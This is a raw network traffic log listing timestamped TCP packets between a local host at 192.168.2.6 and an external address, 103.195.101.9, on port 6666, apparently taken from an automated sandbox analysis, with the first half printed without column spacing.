                                            Mar 14, 2024 16:35:29.139151096 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.139180899 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139220953 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139230967 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.139259100 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139298916 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139319897 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.139337063 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139373064 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139384985 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.139595032 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139632940 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139647961 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.139930964 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139995098 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.140003920 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140042067 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140081882 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140099049 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.140326977 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140366077 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140378952 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.140403986 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140443087 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140445948 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.140547991 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140584946 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140602112 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.140623093 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140661001 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140666008 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.140880108 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140918970 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140927076 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.140955925 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.140993118 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.141026020 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.141062975 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.141098976 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.141108036 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.141218901 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.141263962 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.141279936 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.233227015 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.259363890 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.259390116 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.259455919 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.259470940 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.259593010 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.259634018 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.259732008 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.259747982 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.259789944 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.259845972 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.259969950 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260018110 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.260056973 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260111094 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260149956 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.260272980 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260328054 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260373116 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260374069 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.260440111 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260483027 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.260503054 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260613918 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260648966 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.260724068 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260771036 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260812044 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.260828972 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.260996103 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261044025 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.261061907 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261120081 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261173964 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.261209011 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261334896 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261378050 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.261641026 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261751890 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261794090 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.261851072 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261950016 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261965990 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.261996984 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.262012005 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262053013 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.262092113 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262151003 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262197018 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262198925 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.262238026 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262276888 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.262346983 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262500048 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262522936 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262543917 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.262590885 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.262630939 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.353286028 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380027056 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380045891 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380057096 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380069971 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380081892 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380095959 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380106926 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380167007 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380213022 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380253077 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380285025 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380307913 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380309105 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380363941 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380407095 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380410910 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380563021 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380656004 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380681038 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380750895 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380764008 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380800962 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380811930 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380852938 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380882025 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380945921 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.380986929 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.380990982 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381042957 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381135941 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381139994 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.381186008 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381227970 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.381283045 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381535053 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381582975 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.381618977 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381822109 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381869078 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.381872892 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381886959 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381927013 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.381947041 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381972075 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.381984949 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.382009029 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.382011890 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.382036924 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.382055998 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.382258892 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.382278919 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.382298946 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.382333994 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.382347107 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.382371902 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500148058 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500180006 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500193119 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500205994 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500210047 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500226021 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500240088 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500242949 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500256062 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500269890 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500283003 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500286102 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500299931 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500307083 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500314951 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500334978 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500358105 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500363111 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500375986 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500390053 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500403881 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500422001 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500444889 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500498056 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500538111 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500577927 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500588894 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500591040 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500629902 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500678062 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500696898 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500730038 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500757933 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500777960 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500814915 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.500946999 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.500967026 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501000881 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.501215935 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501235962 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501270056 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.501569986 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501606941 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501620054 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501632929 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501646042 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.501667976 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.501677036 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501691103 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501717091 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501734972 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.501791954 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.501831055 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.502019882 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.502033949 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.502073050 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.502079964 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.502104998 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.502137899 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.620312929 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620373964 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620414019 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620445967 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.620454073 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620491028 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620518923 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.620527983 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620568991 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620609045 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620636940 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.620646000 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620682955 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.620685101 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.620734930 CET666649712103.195.101.9192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Mar 14, 2024 16:35:29.620760918 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.620881081 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.620918036 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.620973110 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621010065 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621012926 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621052027 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621054888 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621093988 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621129990 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621133089 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621167898 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621190071 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621205091 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621242046 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621278048 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621315956 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621318102 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621352911 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621388912 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621400118 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621429920 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621469975 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621476889 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621506929 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621535063 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621543884 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621582031 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621582031 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621622086 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621659040 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621661901 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621697903 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621736050 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621743917 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621774912 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621802092 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.621814013 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621850967 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621895075 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621931076 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.621939898 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.622019053 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.740727901 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.740751982 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.740792990 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.741698027 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741744041 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741750002 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.741758108 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741801023 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.741844893 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741857052 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741868973 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741882086 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741893053 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741911888 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741913080 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.741936922 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.741949081 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.741976976 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742002010 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742018938 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742033005 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742054939 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742090940 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742096901 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742105961 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742119074 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742147923 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742165089 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742178917 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742189884 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742202997 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742206097 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742234945 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742263079 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742307901 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742312908 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742321968 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742335081 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742347002 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742358923 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742372036 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742393970 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742397070 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742407084 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742425919 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.742441893 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742455959 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.742491007 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.743047953 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.743062973 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.743093014 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.743141890 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.743161917 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.743185043 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.743212938 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.743247032 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.743258953 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.743421078 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.743469954 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.860735893 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861470938 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861486912 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861530066 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861597061 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861610889 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861613989 CET  49712        6666       192.168.2.6    103.195.101.9
Mar 14, 2024 16:35:29.861624956 CET  6666         49712      103.195.101.9  192.168.2.6
Mar 14, 2024 16:35:29.861685991 CET  6666         49712      103.195.101.9  192.168.2.6
